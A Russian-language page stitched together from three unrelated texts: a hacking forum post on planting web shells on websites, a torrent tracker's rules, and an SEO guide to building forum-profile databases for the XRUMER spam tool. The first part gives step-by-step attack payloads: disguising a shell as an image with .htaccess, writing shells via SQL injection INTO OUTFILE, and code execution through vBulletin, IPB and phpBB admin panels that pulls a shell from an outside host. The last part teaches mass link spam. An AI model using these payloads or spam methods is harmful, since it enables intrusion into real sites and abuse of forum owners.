Привет %username% и его друзья. Ну вот нужно срочно залить шелл на сайт, ну мало ли, может конечный гонорар от этого зависит. Ну а никак не получается. Вот собрал пару примеров (спасибо tracy и другим за это).
Льем шелл через картинку
Вы взломали сайт (разумеется только тестируете) с самописной админкой… И не можете залит веб-шелл, но там присутствует заливка картинок и загружает только форматы.jpg, .gif, .png.
Что в этом случаем можно сделать?
Пихаем шелл с расширением.gif в какую нибудь папку с картинками, и создаем файл.htaccess с содержимым
AddType application/x-httpd-php .gif
Данная команда выполнит формат.gif как php
Пробуем открыть /shell.gif
Так же, если скрипт не равнодушен к переносу строки, пробуем залить шелл попутно переименовав его в shell.php%00.jpg , проверять доступность shell.php, а вдруг?
Способ заливки шелла через mysql.user из скули
1)Узнаем из под кого мы сидим и узнаем так же его права к mysql.
site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Узнаем под кем мы сидим)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user="наш юзер
"+--+
(Проверим привилегии нашего юзера. Если выдаёт ошибку при выводе, можно похексить нашего юзера 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+"Путь до файла
"+--+
(Заливаем мини-шелл)
P.S
Что бы всё получилось нужно имееть права на запись и знать полный путь до корня.
Так же проверить права на запись можно так:
site.com/index.php?id=1+and+1=0+union+Select+1,"prava
",3+from+mysql.user+--+
Если prava отобразится, то права есть.
Следующая ситуация. Мы в админке форумного движка vBulletin
Заходим:
Plugins & Products -> Plugin Manager -> Плагины & Продукты -> Менеджер плагинов -> [Добавить новый плагин]
Выбираем темптлей. Обычно выбирают faq_complete, выбираем и жмем галочку Plugin is Active выставляем «Yes» и сохраняем.
localhost/forum/faq.php?cmd=phpinfo();
Если мы вывели phpinfo() то считайте шелл у нас в руках.
Далее в phpinfo нужно найти полный путь до форума (например /home/u0000/site.ru/www/sell.php)
. Далее нам нужно наш веб-шелл превратить в txt файл и залить на любой сайт
mysite.com/shell.txt
Шелл заливаем командой
localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что делает эта команда? Она копирует содержимое переменной [a] в переменную [b], то есть shell.txt копирует в shell.php
Заливаем шелл в IPB 3
Заходим:Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос
Код:
select 0x3c3f706870696e666f28293b3f3e into outfile "Z:/home/site.ru/www/uploads/shell.php"
Полный путь можно посмотреть так:
Админка->Поддержка
Там будет сверху написана версия PHP и слева ссылка на PHPINFO
Шелл тут:
http://site.com/uploads/shell.php
Заливаем шелл в phpBB 2
1. Создаём файл ex.sql
2. Прописываем туда
UPDATE phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Где user_id=2 — идентификатор администратора
3. Заходим в админ-панель
4. В админ-панеле выбираем пункт «Восстановить БД» и загружаем ex.sql
5. Выполняем код / Заливаем шелл так
Заходим:
http://target/profile.php?mode=editprofile&e=phpinfo();
После:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что бы вывести phpinfo() нужно быть авторизованным.
Это только коротенький список, как и на какие движки можно залить шелл. Нужно больше? Welcome к ребятам на rdot
заливка на форумы
заливка на cms
А вот и мой любимый шелл, тоже на rdot))
Правила и ограничения на трекере.
1. Общие положения и ограничения
1.1. Данные правила трекера не подлежат обсуждению и обязательны к безусловному выполнению всеми, присутствующими на трекере. Только Администраторам трекера разрешено не соблюдать некоторые положения правил в исключительных ситуациях.
1.2. Администрация трекера является единственной и высшей инстанцией, где можно разрешить любые конфликтные ситуации, касающиеся трекера и его пользователей. Таким образом, решения Администраторов окончательные и обжалованию не подлежат.
1.3. Администрация Трекера оставляет за собой право изменять и дополнять все пункты данных правил без предварительного или последующего уведомления. Дополнения и изменения правил вступают в силу с момента их опубликования. Однако в качестве акта доброй воли Администрация будет стараться по возможности доводить такие изменения до сведения пользователей.
1.4. Незнание этих и других Правил Трекера не только не освобождает от ответственности за их нарушение, но и само по себе является нарушением и отягчающим вину обстоятельством.
1.5. Запрещается использовать какие-либо программы для фальсификации данных о Вашем Upload"e и Download"e. Читеры моментально отправляются в бан.
1.7. Запрещено использование неисправностей и ошибок трекера в личных целях. В случае обнаружения неисправностей и ошибок необходимо поставить Администрацию Трекера в известность.
2. Регистрация
Регистрация является неотъемлемой частью присутствия на трекере. Прохождение регистрации автоматически обозначает Ваше согласие с данными Правилами. Если Вы не согласны с данными Правилами, напишите администрации.
2.1. ЗАПРЕЩАЕТСЯ РЕГИСТРАЦИЯ С РАЗЛИЧНЫХ ЗАРУБЕЖНЫХ ПРОКСИ-СЕРВЕРОВ. Нарушителям - моментальный бан!!!
В исключительных случаях допускается только после рассмотрения заявки администрацией.
2.2. ЗАПРЕЩАЕТСЯ РЕГИСТРАЦИЯ С ОДНОГО КОМПЬЮТЕРА БОЛЕЕ ДВУХ АККАУНТОВ. При нарушении банятся все имеющиеся аккаунты.
Регистрация нового аккаунта, после имеющихся двух, возможна только с согласия администрации.
3. Правила комментирования раздач
3.1. Запрещено использование ненормативной лексики в комментариях к раздачам, любые нецензурные слова и выражения, завуалированный мат, в том числе на иностранных языках.
Наказание: Удаление нарушающих правила комментариев и запрет на написание комментариев сроком на 1 неделю. При последующем нарушении данного правила, бан сроком на 7 дней и запрет на написание комментариев сроком на 14 дней. В дальнейшем - перманентный запрет на написание комментариев.
3.2. Запрещается оскорблять участников трекера в любой форме. Запрещено проявление любой грубости, личных оскорблений и нецензурных высказываний в отношении других участников, нанесения вреда их репутации, унижающих их честь и достоинство, в том числе публичное выяснение личных отношений, как в личных сообщениях на трекере, так и в комментариях к раздачам. Участники должны соблюдать уважительную форму общения.
Наказание: Удаление нарушающих правила комментариев и бан нарушителя сроком на 7 дней. При последующем нарушении данного правила, бан сроком на 7 дней и запрет на написание комментариев сроком на 30 дней. В дальнейшем - перманентный запрет на написание комментариев.
3.3. Запрещены угрозы любого характера (виртуальные, реальные и другие угрозы в адрес участников трекера).
Наказание: Удаление сообщений и бан нарушителя сроком на 14 дней. При повторном нарушении данного правила бан на месяц.
3.4. Запрещены флейм (сообщения не по существу, призванные развязать спор, а также переход на личности обсуждающих), флуд (сообщения, не соответствующие теме, не несущие смысловой нагрузки или состоящие из одних только смайлов), оффтоп (сообщения, не относящиеся к обсуждаемой теме), а также побуждения к флуду, флейму, оффтопу и сообщения типа: "Помогите", "Проблема", "А о чем это вы, а?" или "Так я не понял - откуда качать?" и им подобные, не относящиеся к данной раздаче. В одном комментарии может быть не более 3 смайлов.
Наказание: Удаление нарушающих правила комментариев и предупреждение автора комментария сроком на 3 дня. При повторном нарушении данного правила автору комментария выдается запрет на написание комментариев сроком на 7 дней. В дальнейшем при каждом нарушении выдается запрет на оставление комментариев сроком на 14 дней и запрет на скачивание сроком на 14 дней.
3.5. Запрещено в комментариях размещение сообщений коммерческого характера, прямой или косвенной рекламы, спам-рассылок и ссылок на сайты, непосредственно не связанных с раздачей.
Наказание: Удаление рекламы, запрет на написание комментариев сроком на 7 дней и запрет на скачивание сроком на 7 дней. При повторном нарушении запрет на написание комментариев сроком на 15 дней и запрет на скачивание сроком на 15 дней. В дальнейшем перманентный запрет на написание комментариев.
3.6. Запрещено в комментариях проявлять расовую, национальную и религиозную неприязнь, агитировать политические партии, пропагандировать терроризм, экстремизм, наркотики, религии и прочие темы, несовместимые с общепринятыми законами морали и приличия.
Наказание: Удаление нарушающих правила комментариев, запрет на написание комментариев сроком на 14 дней и запрет на скачивание сроком на 14 дней. При повторном нарушении запрет на написание комментариев сроком на 30 дней и запрет на скачивание сроком на 30 дней. В дальнейшем перманентный запрет на написание комментариев.
3.7. Запрещено оставлять комментарии, явно или скрыто нарушающие УК РФ, а также сообщения, призывающие к совершению противоправных действий.
Наказание: Удаление сообщений, запрет на написание комментариев сроком на 14 дней и запрет на скачивание сроком на 14 дней. При повторном нарушении бан нарушителя сроком на 30 дней. При третьем нарушении - перманентный бан.
3.8. Запрещено в комментариях к раздачам разглашение любых личных данных пользователей, конфиденциальных данных, настоящих Ф.И.О., публикация фотографий, распространение сведений о частной жизни участника обсуждения, составляющих его личную или семейную тайну, без его согласия.
Наказание: Удаление нарушающих правила комментариев и устное предупреждение участника трекера. При повторном нарушении запрет на написание комментариев сроком на 7 дней. В дальнейшем запрет на написание комментариев сроком на 30 дней.
3.9. Запрещено выкладывание в комментариях изображений, содержащих порнографию, сцены жестокости или любые другие изображения, унижающие или оскорбляющие других пользователей.
Наказание: Удаление нарушающих правила комментариев и запрет на скачивание и оставление комментариев сроком на 7 дней. При повторном нарушении бан пользователя сроком на 7 дней. В дальнейшем - бан сроком на 15 дней и перманентный запрет на написание комментариев.
3.10. Запрещено использовать в комментариях язык, отличный от русского, и шрифт, отличный от кириллического.
Наказание: Удаление сообщений и устное предупреждение пользователя, при повторном нарушении правил данного пункта запрет на написание комментариев сроком на 3 дня.
3.11. Запрещено использование в сообщениях следующих способов выделения: красного цвета, более 75% заглавных букв и шрифта большого размера – это привилегия модераторов и администраторов.
Наказание: Удаление сообщений и устное предупреждение пользователя, при повторном нарушении правил данного пункта запрет на написание комментариев сроком на 7 дней.
3.12. Запрещен оверквотинг (цитирование сообщений других участников в количествах, превышающих разумные (более 10 строк оригинального сообщения)).
Наказание: Редактирование сообщения и устное предупреждение пользователя, при повторном нарушении правил данного пункта запрет на написание комментариев сроком на 3 дня.
3.13. Запрещается спойлерить, и воздерживайтесь от использования спойлеров (раскрытие ключевых моментов сюжета, знание которых может испортить другим впечатление от просмотра, результата матча и т.д.).
Если же обойтись без спойлеров нельзя, то нужно обязательно заключить спойлер в тег [еxpand] и ставить перед ним пометку «Спойлер».
Примечание: В "спортивных" раздачах запрещается спойлерить до 11 комментария (1 страница).
Наказание: Редактирование сообщения и устное предупреждение пользователя. При повторном нарушении правил данного пункта запрет на написание комментариев сроком на 3 дня.
3.14. Запрещается публикация сообщений, содержащих заведомо ложнyю информацию.
Наказание: Удаление нарушающих правила комментариев и устное предупреждение пользователя. При повторном нарушении правил данного пункта запрет на оставление комментариев сроком на 7 дней.
Система комментариев торрентов создана для того чтобы:
- Высказать свое уважение и благодарность раздающему,
- Задать интересующий вас конкретный вопрос относительно раздачи,
- Сообщить интересную информацию, относящуюся к раздаче.
4. Ограничения на аватары и подписи:
4.1. Подпись:
- Максимальная высота: 100 точек (другими словами, не больше четырех юзербаров или десяти строк текста (размер шрифта 10); ширина: 750 точек.
- Общий вес изображений, содержащихся в подписи, не должен превышать 200 Kb.
- Содержание: недопустимы насилие, угрозы (на демографической, национальной, религиозной или политической основе), сквернословия (ненормативная лексика, обзывательства, грубость и т.д.), разврат (порнография), дискриминация в любых проявлениях, тексты и изображения рекламного или коммерческого характера, имитация званий/рангов этого ресурса, а также изображения провокационного толка, в т.ч. с использованием нацистской символики.
- Анимация: сильно мигающие подписи запрещены (степень мигания определяется администрацией).
- Подпись под Вашими сообщениями не может быть использована для создания ссылок на какие-либо ресурсы сети. (исключения составляют ссылки на сайты с юзербарами, сервисы наподобие youtube, google и т.п.)
4.2. Aватара:
- Максимальный размер: 100х100 точек; вес: до 21 Кб.
- Содержание: недопустимы насилие, угрозы (на демографической, национальной, религиозной или политической основе), сквернословия (ненормативная лексика, обзывательства, грубость и т.д.), разврат (порнография), дискриминация в любых проявлениях, пропаганда наркотиков, коммерческая реклама и рекламные тексты, имитация званий/рангов этого ресурса, намеренная схожесть с аватарами членов администрации, а также изображения провокационного толка, в т.ч. с использованием нацистской символики.
- Анимация: сильно мигающие аватары запрещены (степень мигания определяется администрацией).
Наказание: Удаление подписи и аватары, или запрет на их использование (определяется администратором).
5. Релизы
5.1. Запрещается перезаливать релизы на другие трекеры без личного разрешения релизера. Поддержка раздачи запрещенного к перезаливу релиза на другом трекере приравнивается к самостоятельному перезаливу и наказывается в соответствие с п.7.
6. Прочее
6.1. Запрещается закачка содержимого раздач с использованием файлообменников типа vip-file, letitbit и прочих...
6.2. Запрещается использование для закачки торрента любых менеджеров закачек.
7. Наказание:
За указанные в пп.5-6 нарушения - бан на 7 дней. При повторном нарушении данных пунктов правил - пожизненный бан.
Хитрый способ сбора качественной пробиваемой базы для XRUMER
Всем привет! Ни для кого не секрет, что каким бы замечательным не был софт для массовой регистрации/рассылки, без надлежащего качества баз он почти не имеет ценности. Базы можно добыть различными способами – спарсить самому /купить /найти в паблике/etc. Каждый вариант хорош по – своему и у каждого из них есть свои плюсы и минусы.
Паблик базы. Основной плюс это бесплатность. Часто в паблик сливаются и покупные базы, так что найти стоящие все-таки можно, другое дело что по этим базам будет работать сразу большое количество вебмастеров(как с лиц, так и с ломаным хрумом) и они быстро превратятся в помойку, а как известно, 1 трастовая ссылка зачастую лучше чем 1000 с гавносайтов.
Покупка базы. В основном это лотерея. Селлеров сейчас достаточное количество, но еще больше барыг, которые покупают и перепродают базы, выдавая за свои свежеспарсенные.Данный метод получения базы хорош в том случае если вы дорожите своим временем и покупаете базу у проверенного временем человека.
Самостоятельный парсинг. Самый лучший, но в тоже время затратный вариант. Для успешного парсинга нужно обладать словарем по тематике, признаками для парсинга + свежими прокси/соксами, если вы соберетесь парсить google, к примеру. Разумеется нужен и сам парсер, для хрумоводом все проще, так как с хрумером идет Hrefer, но все же я рекомендовал еще купить что-нибудь дополнительно. Лично я использую webparser, хотя многие хвалят a-parser, в общем кто на что горазд и у кого какие потребности.
База собранная собственноручно дает небольшое временное преимущество над другими вебмастерами, но не стоит думать, что собрав скажем базу форумов по хорошим признакам вы не обнаружите на доброй половине из них спам от «собратьев по оружию», но в любом случае свежеспаршенные (сырые) базы будут лучше паблик и зачастую лучше покупных, но как говорится этот вариант для тех у кого хорошие аппаратные мощности + есть время.
Есть конечно же еще варианты – утащить с чужого сервера, пропарсить интернет по примерно такому запросу
Пример лота в телдери:
_http://www.telderi.ru/ru/viewsite/67448
Как видим: “также прогонялся по профилям, прогон по профилям и каталогам был осуществлен 30 дней назад”, значит это “наш клиент”. Копируем урл сайта к себе в текстовый файл.
Таким нехитрым способом мы собираем БАЗУ сайтов, которые когда-либо прогонялись хрумером или ручками по трастовым сайтам. Отмечу тот факт, что большинство прогонщиков работают с дефолтным хрумером без измененного файла xas_AI.txt, что опять же нам на руку.
Буквально за час, можно собрать около 200 урлов сайтов, которые были «запачканы» прямым прогоном хрумером. Далее мы идем пополнять коллекцию на SEO форумы, там мы ищем темы с прогонами и смотрим на отзывы, форумов полно, для примера :
_http://www.maultalk.com/forum38.html
Далее идем по популярным веткам прогонщиков и смотрим в темах тех, кто оставлял отзывы об услуге. В 85% случаев, если у них заполнено поле сайт в профиле и подпись, то там находится их сайт, по которому они заказывали прогон, причем зачастую не один.
Работа по сбору таких урлов немного нудная, но зато эффект будет достойным(пока поверьте на слово).
После 2-3 часов работы, которую можно сбагрить на аутсорс толковому школьнику за 100-150 рублей с , мы получаем приличный список сайтов, теперь дело за малым – вытащить обратные ссылки.
Для начала идем в _ http://ahrefs.com и (можно воспользоватся другим софтом/сервисами) и извлекаем ВСЕ обратные ссылки
.
Данную нудную работу тоже лучше поручить кому-то.
Вторым этапом будет подготовка урлов для парсинга, и тут опять следует небольшая хитрость.
Нужно составить запросы для ПАРСИНГА примерно такого вида, приведу пример для сайт
«Просмотр профиля» https://сайт/
«Профиль» https://сайт/
«Профиль пользователя» https://сайт/
«Пользователь» https://сайт/
«Сайт» https://сайт/
«Домашняя страница» https://сайт/
«user» https://сайт/
«member» https://сайт/
«profile» https://сайт/
Просто ввести название домена в кавычках «https://сайт»
Просто погуляйте по форумам и посмотрите как выглядят там профили.
Сделать список таких признаков и урлов вам поможет EXCEL и оператор &
В одной колонке у вас урлы, в другой наши простенькие “признаки”:
Наглядный пример:
>>>> <<<<
Что мы получается на выходе на выходе? База профилей в 100% индексе яндекса или гугла, большинство из которых пробивает дефолтный хрумер.
С такими нехитрыми признаками мы парсим ПС (я, обычно, ограничиваюсь Яшей и Гошей)
Безусловно, таким способом соберется много дублей, но база профилей получится достаточно качественная и индексируемая. Никогда не гонитесь за количеством, лучше купить/собрать базу базу из 1000 профилей которые попадают в индекс, чем из 40000 закрытых в индексации и тд.
Основная часть (2)
: В статье про я упомянул про то, что с помощью этих 3 баз можно собрать неплохую базу под хрумер и я вам не врал.
Для начала стоит скачать все 3 базы – ru, su, РФ:
Https://partner.r01.ru/ru_domains.gz
Https://partner.r01.ru/su_domains.gz
Https://partner.r01.ru/rf_domains.gz
Далее скомпоновать из них 1 большой файл с урлами. ВНИМАНИЕ! Данная операция требует больших аппаратных мощностей, если вы ими не обладаете, поделите базы на куски с помощью KeyWordKeeper (скачать можно по ссылке – _) и продолжайте.
После создания большой базы, нам в любом случае придется прибегнуть к помощи KeyWordKeeper, так как всеми нами любимый EXCEL плохо работает с файлами, где больше 1 000 000 строк, поэтому делим нашу базу на куски по 900 000. Получится достаточно много файлов.
Теперь нужно включить голову и подумать, какие конструкции наиболее часто применимы для форумов.
В базе уже содержится приличное количество форумов, но часто форумы создаются на поддоменах основного сайта и не попадают в базу.
Как в основном выглядят поддомены?
Сайт.ру/forum
Сайт.ру/talk
Forum.
Сайт.ру
Talk.
сайт.ру
+ другие вариации
. Соответственно нам нужно добавить talk и forum к существующим URL, делает это все тем же экселевским оператором &
+ сочетанием клавиш CTRL + ENTER для применения формулы ко всему списку.
Теперь самое вкусное, в конце рабочего дня мы все что сделали компонуем в 1 большой файл, перемешиваем и запускаем хрумер в режиме «только регистрация».
Учитывая, что база сырая + многих ресурсов просто не существует, мы ведь только предполагаем что там есть поддомены с форумами, при 100 потоках и 6 мегабитном канале скорость будет составлять около 1200-1600 ссылок (+ многое зависит от железа), те у кого с железом и с каналом дела обстоят лучше прогонят эту базу за пару дней, у остальных же примерно это займет около недели с небольшим. Вторым этапом запускаем редактирование профиля.
В итоге вы получаете на ~65% русскоязычную базу профилей, состоящую из ~8000-9000 ресурсов (у меня вышло примерно столько), где просто проставлена ссылка вида «https://сайт/», активных и не закрытых к индексации ссылок будет в 3-4 раза меньше. Данным способом собираются не только форумные профили, но и профили на движке DLE и тд. Если подойти к делу основательно – найти много сайтов + делать прогоны в несколько раз, чтобы выжать из базы максимум – то можно выжать еще сверху 15-20% ресурсов.
Cпособ можно модернизировать и собирать с помощью него ресурсы любого типа. Статья в первую очередь предназначена для новичков, которые только учатся собирать базы и позволяет за 1 день подготовки собрать базу, которой можно пользоваться несколько месяцев.
Для тех кто не хочет с этим делом заморачиваться, может купить у меня личную базу из 13 000 профилей, собранную данным методом с добавлением ресурсов из ЯК и DMOZ + другие источники (с ценником пока не определился, но если будет спрос, то думаю, 20-25 WMZ вполне адекватная цена).
Надеюсь статья оказалась для вас полезной. Заранее извиняюсь за плохое превью скриншотов + отсутствие видео материала, со временем постараюсь поправить.
Всем хорошего дня!